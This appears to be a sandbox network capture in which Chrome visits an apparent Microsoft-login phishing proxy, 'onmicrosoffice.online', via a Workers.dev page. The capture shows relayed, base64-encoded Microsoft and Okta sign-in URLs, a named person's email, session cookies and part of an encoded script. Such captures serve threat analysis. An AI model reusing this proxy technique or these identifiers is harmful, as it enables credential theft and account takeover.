r=t(3),o=t(21),i=t(7),a=t(0),s=t(1),u=t(9).getInstance(window.ServerData),c=t(5),l=window,d=l.$Config\|\|l.ServerData\|\|{},f=a.Object,p=s.QueryString;e.exports=function(e){var n=this,t=!1!==(e=e\|\|{}).checkApiCanary,a=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49770	104.21.52.206	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:45 UTC	674	OUT	GET /favicon.ico HTTP/1.1 Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:45 UTC	591	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:45 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 3255 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yD4ikJyx74ZB72GdlkkhK%2BQtqkSxsrdHFFQMG%2BOECPzyhaE8JVT%2BxB%2BtAGrJL6TXKsxzU4Qxb%2FDeJUQEpj%2FrHLmUDK9kal%2FvsNEE1VZjkSvSnOp2I4RV6hjO60sM03V%2BVI6mZjtbn4VePTTVxbJ7vfhes2Z1a3NQNmjYQcgYbIQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87966a59e8a3db9a-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:45 UTC	778	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
2024-04-24 13:24:45 UTC	1369	IN	Data Raw: 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e Data Ascii: ont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:n
2024-04-24 13:24:45 UTC	1108	IN	Data Raw: 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e Data Ascii: argin-bottom:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{backgroun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49777	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:46 UTC	3433	OUT	GET /?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ==&sso_reload=true HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0OTU2MTg4Mjk1NzE5NTQuNzRjOGVhMDgtNWI4Zi00YWM1LWIxZTctYzIxMjIwNjAzN2JmJnN0YXRlPURZdEJDc01nRUFDMWVVc3ZCWTBhMTEwUHBVOHBxNWcya0NqWVFMOGZZV1p1STRVUTBfQTJsR1pFWUZqSVJ3aVd5RVZBRzhGcjlKa0tHMUtRYUZXZU02aGtDNnJzckhNbW1BWFRLc2Y3bU51ZjU5ZmVQbHQ5ZjdkNlBoUDNBZXRlNnJtWGZ2ZW10NV9PN2JnQQ== Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=W0H4QtKQv7br; qPdM.sig=U-Oy8SNmt-6MqabUMMHPOKH0nXY; ClientId=A794BA8C4B654B43ACDC7267ACAB95AC; OIDC=1; OpenIdConnect.nonce.v3.PKuzfwUTEvLItbobcOVAyzWnTNk46nlUCuz9anBslxY=638495618829571954.74c8ea08-5b8f-4ac5-b1e7-c212206037bf; X-OWA-RedirectHistory=ArLym14Bctf65mFk3Ag; esctx-yMbl01kPIpQ=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd851iqwTKcGtxOB7U7qoaXs9uh7LORIq6gTHyjKudzTC1CM19nIJXPrKFdQ4fkePJqr3gTVODApOxjtqnZftvgfLn5hLz4nBuNcv_3fTypvkZ8dFI4BL6wEcN2n5GYLOdG_8OuJ-90s0wVyqGG5Kbh8CAA; fpc=AvaH28Aio81MiaUB3bZI-Zw; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8nV2pomA_lu1HEyz2Yh2a2abAjmlN7beaCAcudLYUmBxiRPThwuqOShgJIWDsK4j9vaRXLOWMCw7UBceW2sQUClzV4gKP4eqzQ76hLVD213_uewjjAfJC4QFwms6pWnb33QpGKgdnTPaVwqiCEVHhbQY3t8AFgQwAHQK8DWN78LcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
2024-04-24 13:24:46 UTC	3864	IN	HTTP/1.1 302 Found Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://onmicrosoffice.online/?i4pz914tl=aHR0cHM6Ly9yb3NzLm9rdGEuY29tL2FwcC9vZmZpY2UzNjUvZXhrYnl6aDgzNlB6dkRTZGEweDcvc3NvL3dzZmVkL3Bhc3NpdmU/bG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZ1c2VybmFtZT1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUFqVkVfYUJOaEhMMHZsNTVwckJxNnRBaWlIRTdWUy02NzNIOFF2TVFralRFMnRkYjBLaEl1bC05TDB0emxTLTh1cVZxN09TZzRGRGNkT2pobUVpZEpsbzdTS1FndW5VUkVpb2lLVTBjVFhOejA4ZVB4aGgtUHgzc0xOSXhEX1NMX0J3STNZWTdIR0hJMm1xaV80TTFHWTVWendfM1o0X2VmQnAtXzljcFBIOWw5Y0w0UkJCMWZUeVJJTjNBSWFjVUp4azBieFczaUpzaVdsWGdMd0FpQUl3Q2VoLWFxbGpjLUstNmhkdUFnNzZwSF9NbGZQNlRJU1ZYVUpCbXFxcUJKQ3RRa01hNkl0b29zWHVXa3FvbzUwYklscmdxUnd0a0NGQVJlNXBOS0ZSLUd6aXdaM2FBaFRJaDR6WWZvVjJnYUU4LXRkSWdmdktSM3dUVXpTS1g5WWoxanBDRmE5WHNwazdjZzVFdWRWYld6S2RXRlZuckRYTDZoWXJPODNzMkxxOHQ4eFJDYzNIckd6RzdrYjIwMXl3OHlkNHljbXZXMDY2MUNEaGFXcld3WkZlVkdLeTE3dnJkWWRGMWo3WGJCeDRwN3M0c2xEYU9TRTJoWXFjbWxSaWxwb0FESm5ydUdlOGdOcE1xU1VxMGJmZnFfdW41RE0tTmlYTkktb0JuU1FlMW1iUlFHSDhQZ2EzaUdwX1ZJSkJxajVxa0wxSEVZdkpvYXpfSkRPNnR2YVhQRjRmeUhZZVJ5RWh4TUpZeUcyWk9zVEQ0dGtuYS1vR3lxWlRmVFd1a1ZMeFd6NDNDRmhGQjNOcEFucGpJNTg0cXN3MTBHN0RMTWdKbU8wREdLcGRNbGVNU0Fud3g0Y29JYVRQOXI0OUZKY0RnalJobmJzWnF1UDd1d3pUWnJsWUMwVUp2VnQ5bjdybC14N1lucVdVNFgtYXgtbHgzN3NfZDJkbmIyVDFISHA3X3NQWDYzOS16Rjk4WFhNZW8zMCM= Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 3a1a39ef-3977-4d17-bb18-d5bb082c3301 x-ms-ests-server: 2.1.17846.6 - EUS ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: buid=0.ATQAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8f3NgQXzFlz1F6CzUuYF5Sc1rezYsCGaYyrX-h3pL4vH2Pp9k0FbY24QyB-NCCmuFuKYLFQAGxZTYt_Muyjr5cNa72QeAGxdanAh_eAOl1j0gAA; expires=Fri, 24-May-2024 13:24:46 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: ESTSWCTXFLOWTOKEN=AQABIQEAAADnfolhJpSnRYB1SVj-Hgd8lixCNCRl70QyaQ3nnEUUU_DViKkPkMjksUhWhRiSudCjgBWyIPqa0bRvys5mpUWZOZCQJ4RAnVH71HESASTSrmw8gIohbikGCpPanGAF0WGqWR2cFW2Rtp0FRDzenzWPZX3J-0fyDRQzemwDNLfUv_I86ZW5oWwPtm00HW_9fyiALr46L2BdSqZ5iBftr4o9FDBJlSOf6Rxq7JTyC5-tmLSN1JiJN_s0u7zTkap-KmYI2RQQFxtf46AjVTqR84HPPEYMtMp0JzqTQuK2cRJl5qkWXFaWcjKSrWf8EQEF7ocutHYPrZgq7rLJtnA57JPFYjpmSlL55GIHBPeDbgcaYes9hmjKyUgncx1_TeybEWFU1CkjX5B40VPfWUsPabR2O8liURUWOp2IvcxbvH_4E_9qecq5HSq6fn2z1e1a1ID-3aJuuBh8eJ9-u-HIQplSoWoijUU59iyWR-s6-X454CAA; domain=onmicrosoffice.online; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=AvaH28Aio81MiaUB3bZI-ZyerOTJAQAAAB3_ut0OAAAA; expires=Fri, 24-May-2024 13:24:46 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: cltm=CgAQABoAIgQIDBAF; domain=onmicrosoffice.online; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Date: Wed, 24 Apr 2024 13:24:45 GMT Connection: close content-length: 1704 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-24 13:24:46 UTC	1704	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49778	172.67.203.167	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:46 UTC	380	OUT	GET /favicon.ico HTTP/1.1 Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:46 UTC	581	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:46 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 3255 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=85mmSNsAnwt5Xbsh5KjMGbkpe3CPUZhDjEzWNL3EfuoVeK2Mbtt%2FRHqV1QVyR967rufjj57OcutOXphxK1NgAHThRHfdr5R06JJY4XLX96MXjhC1EIc8prisMTD6LXgG79qFXnVxMfGCrBo%2FIcJkXmNx52HSG4yTfnm%2FVZZSPuI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87966a5e4f532b94-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:46 UTC	788	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=viewpor
2024-04-24 13:24:46 UTC	1369	IN	Data Raw: 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 61 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a Data Ascii: UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s;background-color:transparent;text-decoration:none;color:
2024-04-24 13:24:46 UTC	1098	IN	Data Raw: 6f 6d 3a 31 72 65 6d 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 64 73 2d 72 69 6e 67 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 Data Ascii: om:1rem}}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}@media (prefers-color-scheme:dark){body{background-color:#2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49779	89.116.187.236	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:46 UTC	4656	OUT	GET /?i4pz914tl=aHR0cHM6Ly9yb3NzLm9rdGEuY29tL2FwcC9vZmZpY2UzNjUvZXhrYnl6aDgzNlB6dkRTZGEweDcvc3NvL3dzZmVkL3Bhc3NpdmU/bG9naW5faGludD1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJmNsaWVudC1yZXF1ZXN0LWlkPWMwYmIxZDVmLWY4MTItZTJkMi1iYWU0LWVjNzY1Nzg5N2M2MyZ1c2VybmFtZT1iYXJiYXJhLnJlbnRsZXIlNDByb3MuY29tJndhPXdzaWduaW4xLjAmd3RyZWFsbT11cm4lM2FmZWRlcmF0aW9uJTNhTWljcm9zb2Z0T25saW5lJndjdHg9ZXN0c3JlZGlyZWN0JTNkMiUyNmVzdHNyZXF1ZXN0JTNkclFRSUFSQUFqVkVfYUJOaEhMMHZsNTVwckJxNnRBaWlIRTdWUy02NzNIOFF2TVFralRFMnRkYjBLaEl1bC05TDB0emxTLTh1cVZxN09TZzRGRGNkT2pobUVpZEpsbzdTS1FndW5VUkVpb2lLVTBjVFhOejA4ZVB4aGgtUHgzc0xOSXhEX1NMX0J3STNZWTdIR0hJMm1xaV80TTFHWTVWendfM1o0X2VmQnAtXzljcFBIOWw5Y0w0UkJCMWZUeVJJTjNBSWFjVUp4azBieFczaUpzaVdsWGdMd0FpQUl3Q2VoLWFxbGpjLUstNmhkdUFnNzZwSF9NbGZQNlRJU1ZYVUpCbXFxcUJKQ3RRa01hNkl0b29zWHVXa3FvbzUwYklscmdxUnd0a0NGQVJlNXBOS0ZSLUd6aXdaM2FBaFRJaDR6WWZvVjJnYUU4LXRkSWdmdktSM3dUVXpTS1g5WWoxanBDRmE5WHNwazdjZzVFdWRWYld6S2RXRlZuckRYTDZoWXJPODNzMkxxOHQ4eFJDYzNIckd6RzdrYjIwMXl3OHlkNHljbXZXMDY2MUNEaGFXcld3WkZlVkdLeTE3dnJkWWRGMWo3WGJCeDRwN3M0c2xEYU9TRTJoWXFjbWxSaWxwb0FESm5ydUdlOGdOcE1xU1VxMGJmZnFfdW41RE0tTmlYTkktb0JuU1FlMW1iUlFHSDhQZ2EzaUdwX1ZJSkJxajVxa0wxSEVZdkpvYXpfSkRPNnR2YVhQRjRmeUhZZVJ5RWh4TUpZeUcyWk9zVEQ0dGtuYS1vR3lxWlRmVFd1a1ZMeFd6NDNDRmhGQjNOcEFucGpJNTg0cXN3MTBHN0RMTWdKbU8wREdLcGRNbGVNU0Fud3g0Y29JYVRQOXI0OUZKY0RnalJobmJzWnF1UDd1d3pUWnJsWUMwVUp2VnQ5bjdybC14N1lucVdVNFgtYXgtbHgzN3NfZDJkbmIyVDFISHA3X3NQWDYzOS16Rjk4WFhNZW8zMCM= HTTP/1.1 Host: onmicrosoffice.online Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 